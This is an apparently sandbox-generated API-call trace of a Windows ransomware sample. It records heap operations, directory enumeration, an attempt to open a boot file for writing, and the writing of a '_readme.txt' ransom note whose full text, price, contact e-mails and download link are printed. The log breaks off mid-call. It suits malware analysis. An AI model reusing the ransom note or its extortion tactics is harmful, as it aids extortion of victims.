[0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.608] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0201.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.609] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.609] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.609] PathFindFileNameW (pszPath="") returned="" [0201.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.609] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.609] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.609] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.610] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0201.610] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0201.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.610] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0201.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.610] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.610] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.611] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.611] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.611] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.611] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.611] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0201.611] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.614] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.614] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.614] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.614] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 